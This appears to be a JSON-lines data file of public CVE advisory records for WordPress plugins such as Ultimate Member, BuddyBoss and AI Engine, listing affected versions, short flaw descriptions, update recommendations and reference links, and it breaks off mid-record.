{"CVE_ID":"CVE-2024-8520","slug":"ultimate-member","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the admin_init or user_action_hook function. This makes it possible for unauthenticated attackers to modify a users membership status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffddc03-d4ae-460e-972a-98804d947d09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffddc03-d4ae-460e-972a-98804d947d09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1948C1-L1959C6\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1948C1-L1959C6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L70C4-L70C84\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L70C4-L70C84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1880\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1880\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L41C4-L41C90\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L41C4-L41C90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L146C1-L173C12\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L146C1-L173C12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1945\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/class-admin.php#L1945\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L175C1-L178C7\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/admin\\\/core\\\/class-admin-users.php#L175C1-L178C7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1549\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/trunk\\\/includes\\\/admin\\\/class-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/trunk\\\/includes\\\/admin\\\/class-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10486","slug":"google-listings-and-ads","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64bc7d47-6b63-4fd9-85d4-82126f86308a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64bc7d47-6b63-4fd9-85d4-82126f86308a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-listings-and-ads\\\/tags\\\/2.8.6\\\/vendor\\\/googleads\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-listings-and-ads\\\/tags\\\/2.8.6\\\/vendor\\\/googleads\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36739","slug":"feed-them-social","versionEndExcluding":"2.8.7","description":"The Feed Them Social \u2013 Page, Post, Video, and Photo Galleries plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the my_fts_fb_load_more() function. This makes it possible for unauthenticated attackers to load feeds via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2369818%40feed-them-social&new=2369818%40feed-them-social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2369818%40feed-them-social&new=2369818%40feed-them-social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fcbe3d1-449c-4135-bbf5-9ea9236e5328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fcbe3d1-449c-4135-bbf5-9ea9236e5328?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5602","slug":"ultimate-social-media-icons","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.5. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44a45fb-3bff-4a1f-8319-a58a47a9d76b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44a45fb-3bff-4a1f-8319-a58a47a9d76b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5070","slug":"ultimate-social-media-icons","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e43c5b-a094-44ab-a8a3-52d437f0e00d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e43c5b-a094-44ab-a8a3-52d437f0e00d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1064","slug":"easy-login-woocommerce","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's xoo_el_action shortcode in all versions up to, and including, 2.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239293\\\/easy-login-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239293\\\/easy-login-woocommerce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd62a072-8619-4f51-a52f-2ada7e455cb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd62a072-8619-4f51-a52f-2ada7e455cb1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13860","slug":"buddyboss-platform","versionImpact":"2.8.50","versionEndExcluding":"2.8.51","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018bbp_topic_title\u2019 parameter in all versions up to, and including, 2.8.50 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.41.","recommendation":"Update to version 2.8.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/example\\\/social\\\/forums\\\/forum\\\/redteam\\\/\",\"name\":\"https:\\\/\\\/example\\\/social\\\/forums\\\/forum\\\/redteam\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0ac8a41-553e-473b-82a7-226de17e472d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0ac8a41-553e-473b-82a7-226de17e472d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13859","slug":"buddyboss-platform","versionImpact":"2.8.50","versionEndExcluding":"2.8.51","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018bp_nouveau_ajax_media_save\u2019 function in all versions up to, and including, 2.8.50 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.41.","recommendation":"Update to version 2.8.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d77c8096-40b1-4ac7-881f-6aed98da6752?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d77c8096-40b1-4ac7-881f-6aed98da6752?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11832","slug":"beaver-builder-lite-version","versionImpact":"2.8.4.4","versionEndExcluding":"2.8.5.3","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JavaScript row settings in all versions up to, and including, 2.8.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206556%40beaver-builder-lite-version&new=3206556%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206556%40beaver-builder-lite-version&new=3206556%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2508","slug":"mobile-menu","versionImpact":"2.8.4.4","versionEndExcluding":"2.8.5","description":"The WP Mobile Menu plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_menu_item_icon function in all versions up to, and including, 2.8.4.4. This makes it possible for unauthenticated attackers to add the '_mobmenu_icon' post meta to arbitrary posts with an arbitrary (but sanitized) value. NOTE: Version 2.8.4.4 contains a partial fix for this vulnerability.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cd9569f-3cda-4482-8ccd-c3f362b4e651?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cd9569f-3cda-4482-8ccd-c3f362b4e651?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&old=3125561&new_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&new=3125561&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&old=3125561&new_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&new=3125561&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2765","slug":"ultimate-member","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Skype and Spotify URL parameters in all versions up to, and including, 2.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ddd5fd-137b-478e-952e-b36fc6a5c28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ddd5fd-137b-478e-952e-b36fc6a5c28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L472\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L472\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L117\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3067953%40ultimate-member&new=3067953%40ultimate-member&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3067953%40ultimate-member&new=3067953%40ultimate-member&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1491\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1491\\\/files\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6238","slug":"ai-engine","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The AI Engine plugin for WordPress is vulnerable to open redirect in version 2.8.4. This is due to an insecure OAuth implementation, as the 'redirect_uri' parameter is missing validation during the authorization flow. This makes it possible for unauthenticated attackers to intercept the authorization code and obtain an access token by redirecting the user to an attacker-controlled URI. Note: in the patched version 2.8.5, OAuth is disabled and the 'Meow_MWAI_Labs_OAuth' class is not loaded in the plugin.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.4\\\/labs\\\/oauth.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.4\\\/labs\\\/oauth.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/mcp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/mcp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/oauth.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/oauth.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1edc84fd-8cb5-4899-9444-1b6ae3144917?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1edc84fd-8cb5-4899-9444-1b6ae3144917?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5570","slug":"ai-engine","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The AI Engine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the mwai_chatbot shortcode 'id' parameter in all versions up to, and including, 2.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.2\\\/classes\\\/modules\\\/chatbot.php#L617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.2\\\/classes\\\/modules\\\/chatbot.php#L617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a32dcf96-ec75-46b1-8f1d-608411ad5147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a32dcf96-ec75-46b1-8f1d-608411ad5147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8482","slug":"simple-local-avatars","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Simple Local Avatars plugin for WordPress is vulnerable to unauthorized modification of data in version 2.8.4. This is due to a missing capability check on the migrate_from_wp_user_avatar() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to migrate avatar metadata for all users.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php?marks=1663-1672#L1663\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php?marks=1663-1672#L1663\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340223%40simple-local-avatars&new=3340223%40simple-local-avatars&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340223%40simple-local-avatars&new=3340223%40simple-local-avatars&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d78334-2b38-43ee-acf6-c073d5826213?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d78334-2b38-43ee-acf6-c073d5826213?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2816","slug":"page-views-count","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Page View Count plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the yellow_message_dontshow() function in versions 2.8.0 to 2.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to one on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3282975%40page-views-count&new=3282975%40page-views-count&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3282975%40page-views-count&new=3282975%40page-views-count&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6fb9558-06e5-4297-93df-ee9a6971f0ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6fb9558-06e5-4297-93df-ee9a6971f0ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3987","slug":"mobile-menu","versionImpact":"2.8.4.2","versionEndExcluding":"2.8.4.3","description":"The WP Mobile Menu \u2013 The Mobile-Friendly Responsive Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt text in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.4.3, or a newer patched 